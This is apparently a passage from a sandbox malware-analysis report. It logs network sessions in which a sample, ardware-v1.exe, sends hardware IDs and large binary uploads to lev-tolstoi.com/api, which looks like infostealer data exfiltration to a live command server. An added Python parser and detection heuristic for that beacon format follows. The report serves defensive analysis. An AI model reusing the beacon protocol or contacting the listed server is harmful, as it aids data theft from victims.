2024-12-18 08:58:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (zero-length chunk that terminates the chunked response)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49718 | 104.21.66.86 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:55 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=PWR04A959
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15016
Host: lev-tolstoi.com
2024-12-18 08:58:55 UTC | 15016 | OUT | Data Raw: 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
Data Ascii: --PWR04A959Content-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--PWR04A959Content-Disposition: form-data; name="pid"2--PWR04A959Content-Disposition: form-data; name="lid"tfL8re----PWR04A959Content-Dispositi
2024-12-18 08:58:57 UTC | 1043 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:58:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vfss6qq7ifgbng547kd90jb5pd; expires=Sun, 13-Apr-2025 02:45:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0zn%2BGs5GjFhEcgYJyfyVABbDRZoWVBURF1QCNQy5nGmdHrsKmm5vpKQ0cMdA4S6D1EJQcXF2CIt3%2F8%2B6r0T%2B72I0cyQ9UryV8ypmcfBcoqd4XMNd1dstMoybOsI%2BtA8chU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3df4343b3f5e6e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1557&rtt_var=619&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15946&delivery_rate=1719670&cwnd=235&unsent_bytes=0&cid=5ac141eefd2c56bc&ts=1884&x=0"
2024-12-18 08:58:57 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 08:58:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49719 | 104.21.66.86 | 443 | 7748 | C:\Users\user\Desktop\ardware-v1.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:58:59 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=TRK9XY1MPYD13
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20207
Host: lev-tolstoi.com
2024-12-18 08:58:59 UTC | 15331 | OUT | Data Raw: 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43
Data Ascii: --TRK9XY1MPYD13Content-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--TRK9XY1MPYD13Content-Disposition: form-data; name="pid"3--TRK9XY1MPYD13Content-Disposition: form-data; name="lid"tfL8re----TRK9XY1MPYD13C
2024-12-18 08:58:59 UTC | 4876 | OUT | Data Raw: 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0 (non-printable bytes omitted by the report; 15331 + 4876 = 20207 bytes, matching Content-Length, so the body was sent in two writes, the second one binary)
2024-12-18 08:59:01 UTC | 1039 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:59:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=q5fb68demhadcvnfk2i5qe4sv0; expires=Sun, 13-Apr-2025 02:45:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QEMHniM3xkobdL5gJXlZcztZAchr2NKyjlnbXrdxz9Ei2E8znaOddYTKi0uPI%2FjxZUuhJKqLi0e1Snf4jKRq2J6PSJ4718hhsqSSe8EFY74wjfDSzrJdQe9r0%2B%2FK2GUwBVw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3df4498b98f5f7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1514&rtt_var=572&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21163&delivery_rate=1928665&cwnd=237&unsent_bytes=0&cid=19d493c04ffc0ef6&ts=1845&x=0"
2024-12-18 08:59:01 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 08:59:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
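Sessions 5 to 7 above all have the same shape: a POST to /api with a multipart/form-data body whose first parts are hwid, pid and lid (hwid and lid are identical across the sessions, pid changes), answered with a chunked body "ok <ip>". The following Python is an added example, not code from the report or from the malware. It rebuilds the session 5 request body and response from the bytes shown, extracts the form fields, decodes the chunked reply and applies a beacon heuristic. The closing boundary of the request body is constructed because the report's dump is truncated after the lid field, and real bodies carry further parts after lid (the report shows another Content-Disposition following it). The heuristic itself (POST /api, multipart body containing hwid/pid/lid, 32-hex-digit hwid) is an assumption drawn from this one capture, not a vetted signature.

```python
"""Parse and flag the beacon format seen in sessions 5-7 of the report.

Added example, not part of the Joe Sandbox report or of the sample.
Request bytes are copied from the report's Data Raw where visible; the
closing delimiter is constructed because the dump is truncated.
"""
import re
from typing import Dict

# Session 5 request line and headers as printed in the report.
REQUEST_LINE = "POST /api HTTP/1.1"
REQUEST_HEADERS = {
    "Connection": "Keep-Alive",
    "Content-Type": "multipart/form-data; boundary=0SYGSMFUW8EWPM",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
    "Content-Length": "12817",
    "Host": "lev-tolstoi.com",
}

# Request body: first three parts as captured; the final "--boundary--"
# line is constructed (the real body continues with more parts).
REQUEST_BODY = (
    b'--0SYGSMFUW8EWPM\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    b'AF28D57A4597695CAC8923850305D13E\r\n'
    b'--0SYGSMFUW8EWPM\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n'
    b'--0SYGSMFUW8EWPM\r\nContent-Disposition: form-data; name="lid"\r\n\r\ntfL8re--\r\n'
    b'--0SYGSMFUW8EWPM--\r\n'  # constructed terminator, not in the capture
)

# The two inbound data chunks of session 5, exactly as the report's Data Raw.
RESPONSE_BODY_HEX = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a "
    "30 0d 0a 0d 0a"
)

HWID_RE = re.compile(r"^[0-9A-F]{32}$")


def boundary_from_content_type(content_type: str) -> str:
    """Pull the boundary token out of a multipart/form-data Content-Type."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: raw value} for each form-data part in body."""
    delim = b"--" + boundary.encode()
    fields: Dict[str, bytes] = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m is None:
            continue
        if value.endswith(b"\r\n"):         # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[m.group(1).decode("ascii", "replace")] = value
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:                                  # terminating chunk
            break
        out += raw[pos:pos + size]
        pos += size + 2                                # skip data and its CRLF
    return bytes(out)


def looks_like_lumma_beacon(request_line: str, headers: Dict[str, str],
                            fields: Dict[str, bytes]) -> bool:
    """Heuristic assumed from sessions 5-7 only; not a vetted signature."""
    method, path, _ = request_line.split(" ", 2)
    ctype = headers.get("Content-Type", "")
    hwid = fields.get("hwid", b"").decode("ascii", "replace")
    return (
        method == "POST"
        and path == "/api"
        and ctype.startswith("multipart/form-data")
        and {"hwid", "pid", "lid"} <= set(fields)      # superset: real bodies carry more parts
        and HWID_RE.match(hwid) is not None
    )


def analyze_session5() -> dict:
    """Run the whole pipeline over the session 5 bytes and return the findings."""
    boundary = boundary_from_content_type(REQUEST_HEADERS["Content-Type"])
    fields = parse_multipart(REQUEST_BODY, boundary)
    reply = decode_chunked(bytes.fromhex(RESPONSE_BODY_HEX))
    return {
        "boundary": boundary,
        "fields": {k: v.decode("ascii", "replace") for k, v in fields.items()},
        "reply": reply.decode("ascii", "replace"),
        "beacon": looks_like_lumma_beacon(REQUEST_LINE, REQUEST_HEADERS, fields),
    }


if __name__ == "__main__":
    for key, value in analyze_session5().items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the boundary, the three fields, the decoded reply "ok 8.46.123.189" and the heuristic verdict. In a detection pipeline the same parse would be applied to each reassembled, TLS-decrypted flow to the host; the hwid value is the natural pivot, since it is the same in every session here and is what the server keys the victim on. The "ok <ip>" reply echoes the address the server saw the request come from, which in this capture is the sandbox's egress address, so it should not be treated as an indicator.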


Session ID: 8
Source IP: 192.168.2.8
Source Port: 49720
Destination IP: 104.21.66.86
Destination Port: 443
PID: 7748
Process: C:\Users\user\Desktop\ardware-v1.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:59:02 UTC | 271 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=CY2NMLA0B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1163
Host: lev-tolstoi.com
2024-12-18 08:59:02 UTC | 1163 bytes | OUT
Data Raw: 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
Data Ascii: --CY2NMLA0BContent-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--CY2NMLA0BContent-Disposition: form-data; name="pid"1--CY2NMLA0BContent-Disposition: form-data; name="lid"tfL8re----CY2NMLA0BContent-Dispositi
2024-12-18 08:59:03 UTC | 1041 bytes | IN
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:59:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mr8tkur0it1qogu65o0nh2hrhr; expires=Sun, 13-Apr-2025 02:45:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAE1dJd%2Bp8ZNbB56EYMfFFYdMA8ktIB4OHm7Xq2iesEDPrUjZiQyftGVQ6LifQBFo%2Be3m%2BZox%2FRkPyU7jhVytRnYYT8%2FYNt01oEsDvcNxxJMSDPkxTA2KLeRUqwUelIM%2FcA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3df45f5c25de9b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1438&rtt_var=620&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2070&delivery_rate=1655328&cwnd=192&unsent_bytes=0&cid=193ccdceb4fb3571&ts=867&x=0"
2024-12-18 08:59:03 UTC | 20 bytes | IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 08:59:03 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 9
Source IP: 192.168.2.8
Source Port: 49721
Destination IP: 104.21.66.86
Destination Port: 443
PID: 7748
Process: C:\Users\user\Desktop\ardware-v1.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:59:05 UTC | 276 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=T20P8D76V41Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 590968
Host: lev-tolstoi.com
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 54 32 30 50 38 44 37 36 56 34 31 5a 0d 0a 43 6f 6e 74 65
Data Ascii: --T20P8D76V41ZContent-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--T20P8D76V41ZContent-Disposition: form-data; name="pid"1--T20P8D76V41ZContent-Disposition: form-data; name="lid"tfL8re----T20P8D76V41ZConte
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: 77 f7 ed 8b a4 cb b5 27 68 c9 30 7f b1 40 97 d2 bf de 2f ce 52 4c 03 d5 7f 7b 28 34 0c 39 1f 5b ec 1c 71 7d 1a ed 9b e8 4e 0f 5f d7 2e e9 60 2d c6 03 dd 8c d1 dc 65 0e 01 07 ad 10 50 ae 82 94 28 13 7d f7 a1 47 1e 7a 2d a5 dd b5 66 f8 4c 14 d9 be 2b 67 c9 01 45 9e 47 75 c7 2b d3 1c 45 fb 92 b4 78 5c 0b 4d 46 2c 8a e3 59 5f a7 c7 c5 3d 72 94 b4 62 03 60 5f 1f 54 e3 86 59 36 5e 75 20 3f 35 55 8d b3 72 61 38 1c 73 97 7b 57 cf e9 34 3f 14 77 ff bc b9 3b ea 56 52 ab 24 ba 97 a0 32 14 89 54 65 ae c1 aa 9b 05 20 f9 7f 5f 78 c0 f8 66 26 a6 ce b7 93 b7 8b 91 65 18 04 65 57 72 86 06 ee 32 9a 2a 32 0f 62 e0 c5 da d2 9e 5a ea 82 b7 f7 d6 07 29 3f 58 40 e9 f9 35 39 c7 52 b7 a4 a7 d5 57 9a ce 40 60 bf 28 8a 26 30 2c c8 7a 2b c4 ac e8 d6 67 18 c9 35 b4 6f c5 1c e5 be 5e
Data Ascii: w'h0@/RL{(49[q}N_.`-eP(}Gz-fL+gEGu+Ex\MF,Y_=rb`_TY6^u ?5Ura8s{W4?w;VR$2Te _xf&eeWr2*2bZ)?X@59RW@`(&0,z+g5o^
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: 29 2d 93 78 5f 48 21 39 55 f5 7a 10 9f b7 fe 03 63 fd 79 14 a2 95 7d ae 67 c8 1a db 73 0b f5 cf b4 94 8d e4 c7 69 98 68 55 60 be 8e 37 cb 09 c0 d8 e1 73 bc b0 bd 55 54 c9 5f 48 7f 3d 63 28 eb fe 52 f6 f5 32 52 42 97 e5 86 22 b8 ff 6c 1e 29 dd 00 b3 00 f2 3d d5 2a 07 21 09 d0 3c ee fd 92 93 ee 87 4e e3 e3 1a c4 c1 bc e2 6a 7c 8f 08 e1 ab a0 b8 5d 3c cf d4 ea 24 29 1d 90 b1 b1 88 3e af 21 8d 2c 60 fb fa 7d c2 e2 de 53 dd ac f6 61 74 d7 1d 71 6f ee 6d fa b6 2b 44 48 16 01 0f 03 c3 8f d9 60 1a dd 28 b0 51 3c bf 51 6d 61 87 61 a3 be 12 66 4c e7 84 56 bc be c2 ed e5 d1 c9 64 dd 91 c0 07 83 81 e7 ef fe b9 b4 6b cb 3d a3 95 cd d7 02 a7 02 eb b7 27 95 87 95 23 96 78 58 5d 26 02 1f fe b3 7e a5 81 45 4b 61 e1 6e 47 16 e7 5b 52 1a 9d d3 48 98 f1 f7 e0 1e c1 41 40 8f
Data Ascii: )-x_H!9Uzcy}gsihU`7sUT_H=c(R2RB"l)=*!<Nj|]<$)>!,`}Satqom+DH`(Q<QmaafLVdk='#xX]&~EKanG[RHA@
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: db ea 85 53 31 ec fd 3b a1 61 7b b8 aa b0 10 17 05 c5 8c 47 ba c0 a5 1d 0e d8 c9 17 bc be 47 33 bf 90 1a 7f 6b 03 22 8c ed 2e 09 de 60 26 07 03 0e 24 9c d0 fd 23 f4 cf e8 9a ef 04 88 e3 38 bd f2 05 a2 00 ae fb fe 84 22 0c 8c 7c 36 05 c4 5e 1f d3 d3 41 5f 60 e4 d8 33 13 01 6b 4b 59 c1 a5 fb 47 ff 09 29 06 f6 e7 a7 8b 07 b3 8e 64 29 74 6b 80 e3 0f 9b 57 02 ca 56 e5 b3 ca 8e 10 07 6a 67 96 26 be e8 03 2c a5 9e fb 82 a7 d9 b5 c6 7c 8c d5 b8 d4 f8 bb ac 3d a5 e1 45 be e5 75 08 94 d2 4a e4 4f 73 32 d1 d4 b1 d1 d0 f7 2a 09 a7 9b 9b 48 8c ae e0 8f 30 62 6d 80 53 e2 8a 43 9b 22 3b 16 46 1d 41 86 87 42 13 04 0b a1 5a 77 33 6a b8 30 58 3b 44 a9 f8 7c 50 1b be 73 05 f5 f7 6d 9d 3d d4 9f 70 c2 21 dd 95 97 17 11 a0 40 42 f7 0b 94 a8 ce fe 9b b1 08 a8 ab c2 ce 39 e7 48
Data Ascii: S1;a{GG3k".`&$#8"|6^A_`3kKYG)d)tkWVjg&,|=EuJOs2*H0bmSC";FABZw3j0X;D|Psm=p!@B9H
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: 92 bf 71 46 1b 6f aa 2c e8 53 3a 9a 7a 0a 68 94 66 29 80 82 cc 17 a1 91 a8 97 69 39 2c a6 57 55 36 ee ed 1b 08 2b c3 0e 2e f1 54 4e 44 ba cd b7 35 f3 f7 6e dc 08 9e 70 dd 25 d9 77 cc a0 c0 ec 00 ee b5 02 01 f7 0e db 61 a2 8b 00 b0 96 6d 5e 60 f6 47 21 12 4e 4e a3 d6 7a 02 da 05 44 c4 8d 0c af be 15 9a 15 20 da 26 15 58 83 02 7b 57 a2 52 c6 55 32 d5 10 d7 a7 02 72 8f c8 14 ec 02 76 27 d2 08 a6 70 aa 09 99 90 dd 8b f1 aa f9 41 58 ed 8e 53 24 8a 0b f2 f1 5d 42 91 87 23 a8 4e 53 5c 93 9f 64 69 f1 5a e2 be d0 32 03 8c ae ff ad 37 47 b0 76 dc 3a 7e 93 cb 20 25 cb e4 27 78 8b 41 f0 02 3f 1e e2 b3 20 32 1f 1b 20 d4 b0 eb 67 89 67 27 de b8 1e e1 5b 58 61 c5 29 79 cd ef 99 95 3a 20 cc 39 87 9b ae 75 12 e0 4a d3 8d d3 1e 6e 25 38 33 e3 9e d6 d5 54 4e df 75 3b 99 01
Data Ascii: qFo,S:zhf)i9,WU6+.TND5np%wam^`G!NNzD &X{WRU2rv'pAXS$]B#NS\diZ27Gv:~ %'xA? 2 gg'[Xa)y: 9uJn%83TNu;
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: 95 04 f0 f6 c6 fb ee d3 ca dd 2d a7 82 53 00 48 90 95 19 bb 38 9b 56 8c ef 0b ca 76 b5 1a e3 39 a4 d5 e4 17 c0 52 e2 93 79 b8 af 40 8b 73 53 27 19 65 e0 05 4a b7 1b 5d 67 cf 9d 61 36 ac 1d b4 f3 bc 6b 8c df 1c 7f 5f f4 a1 ba 13 72 47 34 0f 7a 78 2b ba 3d f1 3e 99 4e c2 cf e7 af 0e 57 54 ba b6 9a 1c 0b a7 8e fb ad 6c fe 7d fc 60 5c 85 6c 06 07 dc 67 30 d3 eb d3 d7 33 2b ec 34 c0 d2 23 5e 90 3f d8 ad ad be 56 cb df a5 3b bf d6 fc 4a d0 3c 74 b0 67 b2 99 1a b0 f9 9b 8d a6 e7 0f 6a 62 21 46 e2 45 66 90 f9 f6 de c2 7b f9 43 1b 15 e3 d1 da 54 e1 aa 35 66 72 2a 2f 01 cc 57 99 ab c5 0f 0e f9 3f c0 c1 cd 58 e6 2e c0 10 7f e9 28 09 98 25 1d d8 e0 0b 7c 80 26 89 a6 ef 5f f3 06 12 68 83 62 dc 1c bb 8a 26 3e 53 36 fb 3e 6f 28 72 6c 41 76 96 ad 4d 75 c0 03 7b 8a 77 37
Data Ascii: -SH8Vv9Ry@sS'eJ]ga6k_rG4zx+=>NWTl}`\lg03+4#^?V;J<tgjb!FEf{CT5fr*/W?X.(%|&_hb&>S6>o(rlAvMu{w7
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: 95 25 22 de 74 c1 76 f3 9e 76 00 46 8d ab 27 04 40 6a f4 fc 5d 0d 69 20 a6 0b 4c 41 6b 39 f0 10 37 1a 7e 44 af de db 77 91 2e 06 02 51 9c fe 30 3a 0a 48 dc c1 8d fd e0 59 f6 83 b0 ec 5f 10 43 84 fd 2c 3e 7f ff 42 d2 f8 f6 11 32 88 5e 99 9d 8f 85 cb e5 6e a0 ec 80 bb 6c 98 18 b0 cb ce 2a 68 6d c6 5f 8a 8c 2f c7 7a 9d 7c da e6 a8 3f 67 39 52 1d 73 73 92 a7 43 12 96 12 da 23 f2 a7 37 85 a9 41 d8 2c d9 6e d3 99 21 27 8a 8a 84 c3 3d d1 e7 01 1e 62 9f 96 c2 72 11 0c 00 6d e8 30 2a f7 20 45 f4 55 b5 9f 65 c4 ae 11 ae 8e 27 ce b1 e1 98 68 1e 81 bb 7f be 1b fd d1 6d c6 fe e1 23 f7 4d 7b a4 22 11 f3 2c 17 cf 9d 9c 96 27 11 88 c6 c6 c2 3c 58 d3 36 ca 39 7e fe f2 85 f2 f2 4d 89 b9 cb fd 36 77 c9 22 ec 83 72 4d cf 60 38 62 12 bf 0b a4 04 30 a5 04 d9 22 88 a9 fc a7 dc
Data Ascii: %"tvvF'@j]i LAk97~Dw.Q0:HY_C,>B2^nl*hm_/z|?g9RssC#7A,n!'=brm0* EUe'hm#M{",'<X69~M6w"rM`8b0"
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
